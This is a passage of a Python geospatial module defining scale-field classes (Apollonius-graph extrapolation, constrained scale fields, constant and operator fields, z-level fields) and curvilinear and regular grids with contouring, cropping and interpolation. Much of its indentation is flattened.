def __getstate__(self):
""" the CGAL.ApolloniusGraph can't be pickled - have to recreate it
"""
d = self.__dict__.copy()
d['_lin_interper']=None
return d
class PyApolloniusField(XYZField):
"""
Takes a set of vertices and the allowed scale at each, and
extrapolates across the plane based on a uniform telescoping rate
"""
# But it's okay if redundant factor is None
def __init__(self,X=None,F=None,r=1.1,redundant_factor=None):
"""r: telescoping rate
redundant_factor: if a point being inserted has a scale which
is larger than the redundant_factor times the existing scale
at its location, then don't insert it. So typically it would
be something like 0.95, which says that if the existing scale
at X is 100, and this point has a scale of 96, then we don't
insert.
"""
if X is None:
assert F is None
self.r = r
self.redundant_factor = redundant_factor
self.offset=np.array([0,0]) # not using an offset for now.
if (X is None) or (redundant_factor is not None):
super(PyApolloniusField,self).__init__(X=np.zeros( (0,2), np.float64),
F=np.zeros( 0, np.float64))
else:
super(PyApolloniusField,self).__init__(X=X,F=F)
        if (X is not None) and (self.redundant_factor is not None):
for i in range(F.shape[0]):
self.insert(X[i],F[i])
def insert(self,xy,f):
""" directly insert a point into the Apollonius graph structure
note that this may be used to incrementally construct the graph,
if the caller doesn't care about the accounting related to the
field -
returns False if redundant checks are enabled and the point was
deemed redundant.
"""
if (self.X.shape[0]==0) or (self.redundant_factor is None):
redundant=False
else:
existing=self.interpolate(xy)
redundant=existing*self.redundant_factor < f
if not redundant:
self.X=array_append(self.X,xy)
self.F=array_append(self.F,f)
return True
else:
return False
def value(self,X):
return self.interpolate(X)
def interpolate(self,X):
X=np.asanyarray(X)
newF = np.zeros( X.shape[:-1], np.float64 )
if len(self.F)==0:
newF[...]=np.nan
return newF
# need to compute all pairs of distances:
# self.X ~ [N,2]
# X ~ [L,M,...,2]
# some manual index wrangling to get an outside-join-multiply
idx=(slice(None),) + tuple([None]*(X.ndim-1))
dx=X[None,...,0] - self.X[ idx + (0,)]
dy=X[None,...,1] - self.X[ idx + (1,)]
dist = np.sqrt(dx**2 + dy**2)
f = self.F[idx] + dist*(self.r-1.0)
newF[...] = f.min(axis=0)
return newF
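    # The extrapolation above implements the telescoping rule: a sample with
    # scale F_i bounds the scale at distance d by F_i + d*(r-1), and
    # interpolate() takes the minimum of that bound over all samples.
    # Quick sketch (hypothetical numbers): a single sample of 10.0 at the
    # origin with r=1.1 allows a scale of 10.0 + 100*0.1 = 20.0 at distance 100.
    #   apf = PyApolloniusField(X=np.array([[0.,0.]]),F=np.array([10.]),r=1.1)
    #   apf.value(np.array([100.,0.]))   # => 20.0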
def to_grid(self,*a,**k):
# XYZField implementation is no good to us.
return Field.to_grid(self,*a,**k)
@staticmethod
def read_shps(shp_names,value_field='value',r=1.1,redundant_factor=None):
""" Read points or lines from a list of shapefiles, and construct
an apollonius graph from the combined set of features. Lines will be
downsampled at the scale of the line.
"""
lines=[]
values=[]
for shp_name in shp_names:
print("Reading %s"%shp_name)
layer=wkb2shp.shp2geom(shp_name,fold_to_lower=True)
value_field=value_field.lower()
for i in range(len(layer)):
geo = layer['geom'][i]
scale=layer[value_field][i]
if np.isfinite(scale) and scale>0.0:
lines.append(np.array(geo.coords))
values.append(scale)
return PyApolloniusField.from_polylines(lines,values,
r=r,redundant_factor=redundant_factor)
@staticmethod
def from_polylines(lines,values,r=1.1,redundant_factor=None):
X = []
F = []
edges = []
for coords,value in zip(lines,values):
if len(coords) > 1: # it's a line - upsample
# need to say closed_ring=0 so it doesn't try to interpolate between
# the very last point back to the first
coords = upsample_linearring(coords,value,closed_ring=0)
if all(coords[-1]==coords[0]):
coords = coords[:-1]
# remove duplicates:
mask = np.all(coords[0:-1,:] == coords[1:,:],axis=1)
mask=np.r_[False,mask]
if np.sum(mask)>0:
print("WARNING: removing duplicate points in shapefile")
print(coords[mask])
coords = coords[~mask]
X.append( coords )
F.append( value*np.ones(len(coords)) )
X = np.concatenate( X )
F = np.concatenate( F )
return PyApolloniusField(X=X,F=F,r=r,redundant_factor=redundant_factor)
has_apollonius=False
try:
import CGAL
# And does it have Apollonius graph bindings?
cgal_bindings = None
try:
# from CGAL import Point_2,Site_2
from CGAL.CGAL_Kernel import Point_2# , Site_2
import CGAL.CGAL_Apollonius_Graph_2 as Apollonius_Graph_2
cgal_bindings = 'old'
except ImportError:
pass
if cgal_bindings is None:
# let it propagate out
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Apollonius_Graph_2 import Apollonius_Graph_2,Site_2
# print "Has new bindings"
cgal_bindings = 'new'
has_apollonius=True
class ApolloniusField(XYZField):
""" Takes a set of vertices and the allowed scale at each, and
extrapolates across the plane based on a uniform telescoping rate
"""
# Trying to optimize some -
        # it segfaults under these conditions:
# locality on insert
# locality on query
# redundant_factor = 0.9
# quantize=True/False
# But it's okay if redundant factor is None
# These are disabled while debugging the hangs on CGAL 4.2
# with new bindings
# enable using the last insert as a clue for the next insert
locality_on_insert = False # True
# enable using the last query as a clue for the next query
locality_on_query = False # True
quantize=False
def __init__(self,X,F,r=1.1,redundant_factor=None):
"""
redundant_factor: if a point being inserted has a scale which is larger than the redundant_factor
times the existing scale at its location, then don't insert it. So typically it would be something
like 0.95, which says that if the existing scale at X is 100, and this point has a scale of 96, then
we don't insert.
"""
XYZField.__init__(self,X,F)
self.r = r
self.redundant_factor = redundant_factor
self.construct_apollonius_graph()
# Pickle support -
def __getstate__(self):
""" the CGAL.ApolloniusGraph can't be pickled - have to recreate it
"""
d = self.__dict__.copy()
d['ag'] = 'recreate'
d['last_inserted'] = None
d['last_query_vertex'] = None
return d
def __setstate__(self,d):
self.__dict__.update(d)
self.construct_apollonius_graph()
def construct_apollonius_graph(self,quantize=False):
"""
quantize: coordinates will be truncated to integers. Not sure why this is relevant -
might make it faster or more stable?? pretty sure that repeated coordinates will
keep only the tightest constraint
"""
self.quantize = quantize
if len(self.X) > 0:
self.offset = self.X.mean(axis=0)
else:
self.offset = np.zeros(2)
print("Constructing Apollonius Graph. quantize=%s"%quantize)
self.ag = ag = Apollonius_Graph_2()
self.last_inserted = None
# if self.redundant_factor is not None:
            self.redundant = np.zeros(len(self.X),bool)
for i in range(len(self.X)):
if i % 100 == 0:
print(" %8i / %8i"%(i,len(self.X)))
self.redundant[i] = not self.insert(self.X[i],self.F[i])
print("Done!")
def insert(self,xy,f):
""" directly insert a point into the Apollonius graph structure
note that this may be used to incrementally construct the graph,
if the caller doesn't care about the accounting related to the
field -
returns False if redundant checks are enabled and the point was
deemed redundant.
"""
x,y = xy - self.offset
# This had been just -self.F[i], but I think that was wrong.
w = -(f / (self.r-1.0) )
if self.quantize:
x = int(x)
y = int(y)
pnt = Point_2(x,y)
##
if self.redundant_factor is not None:
if self.ag.number_of_vertices() > 0:
existing_scale = self.value_at_point(pnt)
if self.redundant_factor * existing_scale < f:
return False
##
if self.locality_on_insert and self.last_inserted is not None:
# generally the incoming data have some locality - this should speed things
# up.
try:
self.last_inserted = self.ag.insert(Site_2( pnt, w),self.last_inserted)
except Exception: # no direct access to the real type, ArgumentError
print("CGAL doesn't have locality aware bindings. This might be slower")
self.locality_on_insert=False
self.last_inserted = self.ag.insert(Site_2( pnt, w))
else:
s = Site_2(pnt,w)
# print "AG::insert: %f,%f,%f"%(s.point().x(),s.point().y(),s.weight())
#self.last_inserted = self.ag.insert(s)
# try avoiding saving the result
self.ag.insert(s)
# retrieve it to see if it really got inserted like we think
v = self.ag.nearest_neighbor(pnt)
s = v.site()
print(" %f,%f,%f"%(s.point().x(),s.point().y(),s.weight()))
# it seems to crash if queries are allowed to retain this vertex handle -
# probably the insertion can invalidate it
self.last_query_vertex = None
return True
last_query_vertex = None
def value_at_point(self,pnt):
""" Like interpolate, but takes a CGAL point instead. really just for the
skip_redundant option, and called inside interpolate()
"""
if self.ag.number_of_vertices() == 0:
return np.nan
if self.locality_on_query and self.last_query_vertex is not None:
# exploit query locality
try:
v = self.ag.nearest_neighbor(pnt,self.last_query_vertex)
except Exception: # no direct access to the real type, ArgumentError
print("CGAL doesn't have locality aware query bindings. May be slower.")
self.locality_on_query = False
v = self.ag.nearest_neighbor(pnt)
else:
v = self.ag.nearest_neighbor(pnt)
self.last_query_vertex = v
site = v.site()
dist = np.sqrt( (pnt.x() - site.point().x())**2 +
(pnt.y() - site.point().y())**2 )
# before this didn't have the factor dividing site.weight()
f = -( site.weight() * (self.r-1.0) ) + dist*(self.r-1.0)
return f
def interpolate(self,X):
newF = np.zeros( X.shape[0], np.float64 )
for i in range(len(X)):
x,y = X[i] - self.offset
# remember, the slices are y, x
p = Point_2(x,y)
newF[i] = self.value_at_point(p)
return newF
def to_grid(self,nx=2000,ny=2000,interp='apollonius',bounds=None):
if bounds is not None:
if len(bounds) == 2:
                    extents = [bounds[0][0],bounds[1][0],bounds[0][1],bounds[1][1]]
else:
extents = bounds
else:
extents = self.bounds()
if interp!='apollonius':
print("NOTICE: Apollonius graph was asked to_grid using '%s'"%interp)
return XYZField.to_grid(self,nx,ny,interp)
else:
x = np.linspace(extents[0],extents[1],nx)
y = np.linspace(extents[2],extents[3],ny)
griddedF = np.zeros( (len(y),len(x)), np.float64 )
for xi in range(len(x)):
for yi in range(len(y)):
griddedF[yi,xi] = self( [x[xi],y[yi]] )
return SimpleGrid(extents,griddedF)
@staticmethod
def read_shps(shp_names,value_field='value',r=1.1,redundant_factor=None):
""" Read points or lines from a list of shapefiles, and construct
an apollonius graph from the combined set of features. Lines will be
downsampled at the scale of the line.
"""
lines=[]
values=[]
for shp_name in shp_names:
print("Reading %s"%shp_name)
ods = ogr.Open(shp_name)
layer = ods.GetLayer(0)
while 1:
feat = layer.GetNextFeature()
if feat is None:
break
geo = wkb.loads(feat.GetGeometryRef().ExportToWkb())
lines.append(np.array(geo.coords))
values.append(feat.GetField(value_field))
return ApolloniusField.from_polylines(lines,values,
r=r,redundant_factor=redundant_factor)
@staticmethod
def from_polylines(lines,values,r=1.1,redundant_factor=None):
X = []
F = []
edges = []
for coords,value in zip(lines,values):
if len(coords) > 1: # it's a line - upsample
# need to say closed_ring=0 so it doesn't try to interpolate between
# the very last point back to the first
coords = upsample_linearring(coords,value,closed_ring=0)
if all(coords[-1]==coords[0]):
coords = coords[:-1]
# remove duplicates:
                    mask = np.all(coords[0:-1,:] == coords[1:,:],axis=1)
                    mask = np.r_[False,mask] # align mask with coords
                    if np.sum(mask)>0:
print("WARNING: removing duplicate points in shapefile")
print(coords[mask])
coords = coords[~mask]
X.append( coords )
F.append( value*np.ones(len(coords)) )
            X = np.concatenate( X )
            F = np.concatenate( F )
return ApolloniusField(X=X,F=F,r=r,redundant_factor=redundant_factor)
except ImportError:
#print "CGAL unavailable."
pass
except AttributeError:
# print("You have CGAL, but no Apollonius Graph bindings - auto-telescoping won't work")
pass
if not has_apollonius:
has_apollonius=True
log.debug("Falling back to slow python implementation of ApolloniusField")
ApolloniusField=PyApolloniusField
class ConstrainedScaleField(XYZField):
""" Like XYZField, but when new values are inserted makes sure that
neighboring nodes are not too large. If an inserted scale is too large
it will be made smaller. If a small scale is inserted, it's neighbors
will be checked, and made smaller as necessary. These changes are
propagated to neighbors of neighbors, etc.
As points are inserted, if a neighbor is far enough away, this will
optionally insert new points along the edges connecting with that neighbor
to limit the extent that the new point affects too large an area
"""
r=1.1 # allow 10% growth per segment
def check_all(self):
t = self.tri()
edges = t.edge_db
Ls = np.sqrt( (t.x[edges[:,0]] - t.x[edges[:,1]])**2 +
(t.y[edges[:,0]] - t.y[edges[:,1]])**2 )
dys = self.F[edges[:,0]] - self.F[edges[:,1]]
slopes = abs(dys / Ls)
if any(slopes > self.r-1.0):
bad_edges = where(slopes > self.r-1.0)[0]
print("Bad edges: ")
for e in bad_edges:
a,b = edges[e]
if self.F[a] > self.F[b]:
a,b = b,a
L = np.sqrt( (t.x[a]-t.x[b])**2 + (t.y[a]-t.y[b])**2 )
allowed = self.F[a] + L*(self.r - 1.0)
print("%d:%f --[L=%g]-- %d:%f > %f"%(a,self.F[a],
L,
b,self.F[b],
allowed))
print(" " + str( edges[e] ))
return False
return True
# how much smaller than the 'allowed' value to make nodes
# so if the telescope factor says that the node can be 10m,
# we'll actually update it to be 8.5m
safety_factor = 0.85
def add_point(self,pnt,value,allow_larger=False):
accum = [] # accumulates a list of ( [x,y], scale ) tuples for limiter points
# before adding, see if there is one already in there that's close by
old_value = self(pnt)
if old_value < 0:
print(" count of negative values: ",sum(self.F < 0))
print(" point in question: ",pnt)
print(" old_value",old_value)
fg = self.to_grid(1000,1000)
fg.plot()
global bad
bad = self
raise Exception("Old value at new point is negative!")
if not allow_larger and (value > old_value):
print("Not adding this point, because it is actually larger than existing ones")
return None
            ## ! Need to be careful about leaning too hard on old_value -
# the nearest neighbors interpolation doesn't guarantee the same value
# as linear interpolation between nodes ( I think ), so it's possible for
# things to look peachy keen from the nn interp but when comparing along edges
# it starts looking worse.
## STATUS
# I think the order of adding intermediate points needs to change.
            # maybe we add the starting point, using its old_value
# then look at its neighbors... confused...
print("-----------Adding point: %s %g=>%g-----------"%(pnt,old_value,value))
j = self.nearest(pnt)
dist = np.sqrt( sum((self.X[j] - pnt)**2) )
if dist < 0.5*value:
i = j
print("add_point redirected, b/c a nearby point already exists.")
# need an extra margin of safety here -
# we're updating a point that is dist away, and we need the scale
# right here to be value.
F_over_there = value - dist*(self.r-1.0)
if F_over_there < self.F[i]:
self.F[i] = self.safety_factor * F_over_there
print(" updating value of %s to %f"%(i,self.F[i]))
self.check_scale(i,old_value = old_value)
else:
i = XYZField.add_point(self,pnt,value)
print(" inserted %d with value %f"%(i,self.F[i]))
# these are the edges in which the new node participates
self.check_scale(i,old_value=old_value)
return i
def check_scale(self,i,old_value=None):
"""
old_value: if specified, on each edge, if the neighbor is far enough away, insert
a new node along the edge at the scale that it would have been if we hadn't
adjusted this node
"""
# print "Check scale of %s"%i
# First, make sure that we are not too large for any neighbors:
t = self.tri()
edges = where( t.edge_db == i )[0]
for e in edges:
a,b = t.edge_db[e]
# enforce that a is the smaller of the two
if self.F[a] > self.F[b]:
a,b = b,a
# this time around, we only care about places where i is the larger
if a==i:
continue
L= np.sqrt( (t.x[a] - t.x[b])**2 + (t.y[a] - t.y[b])**2 )
A = self.F[a]
B = self.F[b]
allowed = A + L*(self.r-1.0)
if B > allowed:
# print "Had to adjust down the requested scale of point"
self.F[b] = self.safety_factor*allowed
# Now we know that the new point is not too large for anyone - see if any of
        # its neighbors are too small.
to_visit = [ (i,old_value) ]
to_add = []
orig_i = i
# used to be important for this to be breadth-first...
# also, this whole thing is hack-ish.
while len(to_visit) > 0:
i,old_value = to_visit.pop(0)
t = self.tri()
edges = where( t.edge_db == i )[0]
for e in edges:
a,b = t.edge_db[e]
# Make b the one that is not i
if b==i:
a,b = b,a
# print "From a=%d visiting b=%d"%(a,b)
# So we are checking on point b, having come from a, but
# ultimately we just care whether b is valid w.r.t orig_i
# print "Checking on edge ",a,b
L = np.sqrt( (t.x[orig_i] - t.x[b])**2 + (t.y[orig_i] - t.y[b])**2 )
La = np.sqrt( (t.x[a] - t.x[b])**2 + (t.y[a] - t.y[b])**2 )
# print " Length is ",L
ORIG = self.F[orig_i]
A = self.F[a] #
B = self.F[b]
# print " Scales A(%d)=%g B(%d)=%g"%(a,A,b,B)
allowed = min( ORIG + L*(self.r-1.0),
A + La*(self.r-1.0) )
# print " Allowed from %d or %d is B: %g"%(orig_i,a,allowed)
if B > allowed:
self.F[b] = self.safety_factor * allowed # play it safe...
# print " Updating B(%d) to allowed scale %f"%(b,self.F[b])
to_visit.append( (b,B) )
# elif (B < 0.8*allowed) and (old_value is not None) and (A<0.8*old_value) and (L > 5*A):
elif (B>A) and (old_value is not None) and (A<0.8*old_value) and (L>5*A):
# the neighbor was significantly smaller than the max allowed,
# so we should limit the influence of this new point.
#
# used to be a safety_factor*allowed here, now just allowed...
alpha = (old_value - A) / (old_value - A + allowed - B)
if alpha < 0.65:
# if the intersection is close to B, don't bother...
new_point = alpha*self.X[b] + (1-alpha)*self.X[a]
# another 0.99 just to be safe against rounding
#
# New approach: use the distance to original point
newL = np.sqrt( (t.x[orig_i] - new_point[0])**2 + (t.y[orig_i] - new_point[1])**2 )
# constrained by valid value based on distance from starting point as well as
# the old value
new_value = min(ORIG + 0.95*newL*(self.r-1.0), # allowed value
0.99*(alpha*B + (1-alpha)*old_value) ) # value along the old line
# print "INTERMEDIATE:"
# print " old_value at A: %g"%old_value
# print " new value at A: %g"%A
# print " curr value at B: %g"%B
# print " allowed at B: %g"%allowed
# print " alpha from A: %g"%alpha
# print " new value for interpolated point: %g"%new_value
#
# print "Will add intermediate point %s = %g"%(new_point,new_value)
to_add.append( (new_point, new_value) )
print("Adding %d intermediate points"%len(to_add))
for p,v in to_add:
if v < 0:
raise Exception("Value of intermediate point is negative")
i = self.add_point(p+0.01*v,v,allow_larger=1)
# print "added intermediate point ",i
def remove_invalid(self):
""" Remove nodes that are too big for their delaunay neighbors
"""
while 1:
t = self.tri()
edges = t.edge_db
Ls = np.sqrt( (t.x[edges[:,0]] - t.x[edges[:,1]])**2 +
(t.y[edges[:,0]] - t.y[edges[:,1]])**2 )
dys = self.F[edges[:,0]] - self.F[edges[:,1]]
slopes = (dys / Ls)
bad0 = slopes > self.r-1.0
bad1 = (-slopes) > self.r-1.0
bad_nodes = union1d( edges[bad0,0], edges[bad1,1] )
if len(bad_nodes) == 0:
break
print("Removing %d of %d"%(len(bad_nodes),len(self.F)))
to_keep = np.ones(len(self.F),bool)
to_keep[bad_nodes] = False
self.F = self.F[to_keep]
self.X = self.X[to_keep]
self._tri = None
self._nn_interper = None
self._lin_interper = None
self.index = None
class XYZText(XYZField):
def __init__(self,fname,sep=None,projection=None):
self.filename = fname
fp = open(fname,'rt')
data = np.array([list(map(float,line.split(sep))) for line in fp])
fp.close()
XYZField.__init__(self,data[:,:2],data[:,2],projection=projection)
## The rest of the density field stuff:
class ConstantField(Field):
def __init__(self,c):
self.c = float(c)
Field.__init__(self)
def value(self,X):
X=np.asanyarray(X)
return self.c * np.ones(X.shape[:-1])
class BinopField(Field):
""" Combine arbitrary fields with binary operators """
def __init__(self,A,op,B):
Field.__init__(self)
self.A = A
self.op = op
self.B = B
def __getstate__(self):
d = self.__dict__.copy()
d['op'] = self.op2str()
return d
def __setstate__(self,d):
self.__dict__.update(d)
self.op = self.str2op(self.op)
# cross your fingers...
def op2str(self):
return self.op.__name__
def str2op(self,s):
return eval(s)
    def value(self,X):
        if isinstance(self.A,Field):
            a = self.A.value(X)
        else:
            a = self.A
        if isinstance(self.B,Field):
            b = self.B.value(X)
        else:
            b = self.B
        return self.op(a,b)
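    # Illustrative sketch (hypothetical fields): the operator overloads on
    # Field build BinopField objects lazily, so evaluation happens per query:
    #   total = ConstantField(2.0) + ConstantField(3.0)   # a BinopField
    #   total(np.array([[0.,0.],[10.,10.]]))              # => array([5.,5.])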
class Field3D(Field):
pass
class ZLevelField(Field3D):
""" One representation of a 3-D field.
We have a set of XY points and a water column associated with each.
Extrapolation pulls out the closest water column, and extends the lowest
cell if necessary.
"""
def __init__(self,X,Z,F):
Field3D.__init__(self)
self.X = X
self.Z = Z
self.F = ma.masked_invalid(F)
# 2-D index:
self.surf_field = XYZField(self.X,np.arange(len(self.X)))
self.surf_field.build_index()
def shift_z(self,delta_z):
self.Z += delta_z
def distance_along_transect(self):
        d = (np.diff(self.X,axis=0)**2).sum(axis=1)**0.5
        d = d.cumsum()
        d = np.concatenate( ([0],d) )
return d
def plot_transect(self):
""" Plots the data in 2-D as if self.X is in order as a transect.
The x axis will be distance between points. NB: if the data are not
organized along a curve, this plot will make no sense!
"""
x = self.distance_along_transect()
meshY,meshX = np.meshgrid(self.Z,x)
all_x = meshX.ravel()
all_y = meshY.ravel()
        all_g = np.transpose(self.F).ravel()
        if np.any(all_g.mask):
valid = ~all_g.mask
all_x = all_x[valid]
all_y = all_y[valid]
all_g = all_g[valid]
        plt.scatter(all_x,all_y,60,all_g,linewidth=0)
def plot_surface(self):
        plt.scatter(self.X[:,0],self.X[:,1],60,self.F[0,:],linewidth=0)
_cached = None # [(x,y),idxs]
def extrapolate(self,x,y,z):
pnt = np.array([x,y])
if self._cached is not None and (x,y) == self._cached[0]:
idxs = self._cached[1]
else:
# find the horizontal index:
count = 4
idxs = self.surf_field.nearest(pnt,count)
self._cached = [ (x,y), idxs]
        zi = np.searchsorted( self.Z,z)
if zi >= len(self.Z):
zi = len(self.Z) - 1
vals = self.F[zi,idxs]
weights = 1.0 / ( ((pnt - self.X[idxs] )**2).sum(axis=1)+0.0001)
val = (vals*weights).sum() / weights.sum()
return val
# from pysqlite2 import dbapi2 as sqlite
#
# class XYZSpatiaLite(XYZField):
# """ Use spatialite as a backend for storing an xyz field
# """
# def __init__(self,fname,src=None):
# self.conn = sqlite.connect(fname)
# self.conn.enable_load_extension(1)
# self.curs = self.conn.cursor()
# self.curs.execute("select load_extension('/usr/local/lib/libspatialite.so')")
#
# self.ensure_schema()
#
# if src:
# self.load_from_field(src)
#
# schema = """
# create table points (id, geom ..."""
# def ensure_schema(self):
# pass
#
class QuadrilateralGrid(Field):
""" Common code for grids that store data in a matrix
"""
def to_xyz(self):
xyz = self.xyz()
good = ~np.isnan(xyz[:,2])
return XYZField( xyz[good,:2], xyz[good,2], projection = self.projection() )
class CurvilinearGrid(QuadrilateralGrid):
def __init__(self,X,F,projection=None):
""" F: 2D matrix of data values
X: [Frows,Fcols,2] matrix of grid locations [x,y]
Assumes that the grid is reasonable (i.e. doesn't have intersecting lines
between neighbors)
"""
QuadrilateralGrid.__init__(self,projection=projection)
self.X = X
self.F = F
def xyz(self):
""" unravel to a linear sequence of points
"""
xyz = np.zeros( (self.F.shape[0] * self.F.shape[1], 3), np.float64 )
        xyz[:,:2] = self.X.reshape( (-1,2) )
xyz[:,2] = self.F.ravel()
return xyz
@with_plt
def plot(self,**kwargs):
# this is going to be slow...
self.scatter = plt.scatter( self.X[:,:,0].ravel(),
self.X[:,:,1].ravel(),
c=self.F[:,:].ravel(),
                                    antialiased=False,marker='s',
lw=0,**kwargs )
def apply_xform(self,xform):
new_X = self.X.copy()
print("Transforming points")
for row in range(new_X.shape[0]):
print(".")
for col in range(new_X.shape[1]):
new_X[row,col,:] = xform.TransformPoint(*self.X[row,col])[:2]
print("Done transforming points")
# projection should get overwritten by the caller
return CurvilinearGrid(new_X,self.F,projection='reprojected')
def bounds(self):
xmin = self.X[:,:,0].min()
xmax = self.X[:,:,0].max()
ymin = self.X[:,:,1].min()
ymax = self.X[:,:,1].max()
return (xmin,xmax,ymin,ymax)
# cross-grid arithmetic. lots of room for optimization...
def regrid(self,b,interpolation='nearest'):
""" returns an F array corresponding to the field B interpolated
onto our grid
"""
X = self.X.reshape( (-1,2) )
newF = b.interpolate(X,interpolation=interpolation)
return newF.reshape( self.F.shape )
def __sub__(self,b):
if isinstance(b,CurvilinearGrid) and id(b.X) == id(self.X):
print("Reusing this grid.")
Fb = self.F - b.F
else:
Fb = self.regrid( b )
Fb = self.F - Fb
return CurvilinearGrid(X=self.X, F= Fb, projection=self.projection() )
class SimpleGrid(QuadrilateralGrid):
"""
A spatial field stored as a regular cartesian grid.
The spatial extent of the field is stored in self.extents
(as xmin,xmax,ymin,ymax) and the data in the 2D array self.F
"""
int_nan = -9999
# Set to "linear" to have value() calls use linear interpolation
default_interpolation = "linear"
dx=None
dy=None
def __init__(self,extents,F,projection=None,dx=None,dy=None):
""" extents: minx, maxx, miny, maxy
NB: these are node-centered values, so if you're reading in
pixel-based data where the dimensions are given to pixel edges,
be sure to add a half pixel.
"""
self.extents = extents
self.F = F
QuadrilateralGrid.__init__(self,projection=projection)
if dx is not None:
self.dx=dx
if dy is not None:
self.dy=dy
self.delta() # compute those if unspecified
@property
def shape(self):
return self.F.shape
def copy(self):
return SimpleGrid(extents=list(self.extents),F=self.F.copy(),projection=self.projection())
def delta(self):
"""
x and y pixel spacing. If these are not already set (in self.dx, self.dy)
compute from extents and F.
For zero or singleton dimensions the spacing is set to zero.
"""
if self.dx is None:
if self.F.shape[1]>1:
self.dx = (self.extents[1] - self.extents[0]) / (self.F.shape[1]-1.0)
else:
self.dx = 0.0
if self.dy is None:
assert self.F.shape[0]
if self.F.shape[0]>1:
self.dy = (self.extents[3] - self.extents[2]) / (self.F.shape[0]-1.0)
else:
self.dy = 0.0
return self.dx,self.dy
def trace_contour(self,vmin,vmax,union=True,method='mpl',
gdal_contour='gdal_contour'):
"""
Trace a filled contour between vmin and vmax, returning
a single shapely geometry (union=True) or a list of
polygons (union=False).
Uses matplotlib to do the actual contour construction.
Note that matplotlib is not infallible here, and complicated
or large inputs can create erroneous output. gdal_contour
might help.
To use gdal_contour instead, pass method='gdal', and optionally
specify the path to the gdal_contour executable. This currently
behaves differently than the mpl approach. Here vmin is traced,
and vmax is ignored. This should be harmonized at some point. TODO
"""
if method=='mpl':
cset=self.contourf([vmin,vmax],ax='hidden')
segs=cset.allsegs
geoms=[]
for seg in segs[0]:
if len(seg)<3: continue
geoms.append( geometry.Polygon(seg) )
elif method=='gdal':
import tempfile
(fd1,fname_tif)=tempfile.mkstemp(suffix=".tif")
(fd2,fname_shp)=tempfile.mkstemp(suffix=".shp")
os.unlink(fname_shp)
os.close(fd1)
os.close(fd2)
self.write_gdal(fname_tif)
res=subprocess.run([gdal_contour,"-fl",str(vmin),str(vmax),fname_tif,fname_shp],
capture_output=True)
print(res.stdout)
print(res.stderr)
geoms=wkb2shp.shp2geom(fname_shp)['geom']
union=False
if union:
poly=geoms[0]
for geo in geoms[1:]:
poly=poly.union(geo)
return poly
else:
return geoms
@with_plt
def contourf(self,*args,**kwargs):
X,Y = self.XY()
ax=kwargs.pop('ax',None)
if ax=='hidden':
tmp_ax=True
fig=plt.figure(999)
ax=fig.gca()
else:
tmp_ax=False
ax=ax or plt.gca()
cset=ax.contourf(X,Y,self.F,*args,**kwargs)
if tmp_ax:
plt.close(fig)
return cset
@with_plt
def contour(self,*args,**kwargs):
X,Y = self.XY()
ax=kwargs.pop('ax',None) or plt.gca()
return ax.contour(X,Y,self.F,*args,**kwargs)
@with_plt
def plot(self,**kwargs):
F=kwargs.pop('F',self.F)
func=kwargs.pop('func',lambda x:x)
F=func(F)
dx,dy = self.delta()
        maskedF = ma.array(F,mask=np.isnan(F))
if 'ax' in kwargs:
kwargs = dict(kwargs)
ax = kwargs['ax']
del kwargs['ax']
ims = ax.imshow
else:
ims = plt.imshow
if 'offset' in kwargs:
offset=kwargs.pop('offset')
else:
offset=[0,0]
return ims(maskedF,origin='lower',
extent=[self.extents[0]-0.5*dx + offset[0], self.extents[1]+0.5*dx + offset[0],
self.extents[2]-0.5*dy + offset[1], self.extents[3]+0.5*dy + offset[1]],
**kwargs)
def xy(self):
x = np.linspace(self.extents[0],self.extents[1],self.F.shape[1])
y = np.linspace(self.extents[2],self.extents[3],self.F.shape[0])
return x,y
def XY(self):
X,Y = np.meshgrid(*self.xy())
return X,Y
def xyz(self):
""" unravel to a linear sequence of points
"""
X,Y = self.XY()
xyz = np.zeros( (self.F.shape[0] * self.F.shape[1], 3), np.float64 )
xyz[:,0] = X.ravel()
xyz[:,1] = Y.ravel()
xyz[:,2] = self.F.ravel()
return xyz
def to_xyz(self):
""" The simple grid version is a bit smarter about missing values,
and tries to avoid creating unnecessarily large intermediate arrays
"""
x,y = self.xy()
if hasattr(self.F,'mask') and self.F.mask is not False:
self.F._data[ self.F.mask ] = np.nan
self.F = self.F._data
if self.F.dtype in (np.int16,np.int32):
good = (self.F != self.int_nan)
else:
good = ~np.isnan(self.F)
        i,j = np.where(good)
X = np.zeros( (len(i),2), np.float64 )
X[:,0] = x[j]
X[:,1] = y[i]
return XYZField( X, self.F[good], projection = self.projection() )
def to_curvilinear(self):
X,Y = self.XY()
        XY = np.concatenate( ( X[:,:,None], Y[:,:,None]), axis=2)
cgrid = CurvilinearGrid(XY,self.F)
return cgrid
def apply_xform(self,xform):
# assume that the transform is not a simple scaling in x and y,
# so we have to switch to a curvilinear grid.
cgrid = self.to_curvilinear()
return cgrid.apply_xform(xform)
def xy_to_indexes(self,xy):
dx,dy = self.delta()
row = int( np.round( (xy[1] - self.extents[2]) / dy ) )
col = int( np.round( (xy[0] - self.extents[0]) / dx ) )
return row,col
def rect_to_indexes(self,xxyy):
if len(xxyy)==2:
xxyy=[xxyy[0][0],xxyy[1][0],xxyy[0][1],xxyy[1][1]]
xmin,xmax,ymin,ymax = xxyy
dx,dy = self.delta()
min_col = int( max( np.floor( (xmin - self.extents[0]) / dx ), 0) )
max_col = int( min( np.ceil( (xmax - self.extents[0]) / dx ), self.F.shape[1]-1) )
min_row = int( max( np.floor( (ymin - self.extents[2]) / dy ), 0) )
max_row = int( min( np.ceil( (ymax - self.extents[2]) / dy ), self.F.shape[0]-1) )
return [min_row,max_row,min_col,max_col]
def crop(self,rect=None,indexes=None):
if rect is not None:
indexes=self.rect_to_indexes(rect)
assert indexes is not None,"Must specify one of rect or indexes"
min_row,max_row,min_col,max_col = indexes
newF = self.F[min_row:max_row+1, min_col:max_col+1]
new_extents = [self.extents[0] + min_col*self.dx,
self.extents[0] + max_col*self.dx,
self.extents[2] + min_row*self.dy,
self.extents[2] + max_row*self.dy ]
result=SimpleGrid(extents = new_extents,
F = newF,
projection = self.projection(),
dx=self.dx,dy=self.dy)
return result
def bounds(self):
return np.array(self.extents)
def interpolate(self,X,interpolation=None,fallback=True):
""" interpolation can be nearest or linear
"""
X=np.asanyarray(X)
if interpolation is None:
interpolation = self.default_interpolation
xmin,xmax,ymin,ymax = self.bounds()
dx,dy = self.delta()
if interpolation == 'nearest':
# 0.49 will give us the nearest cell center.
            # recently changed X[:,1] to X[...,1] - hopefully will accommodate
# arbitrary shapes for X
rows = (0.49 + (X[...,1] - ymin) / dy).astype(np.int32)
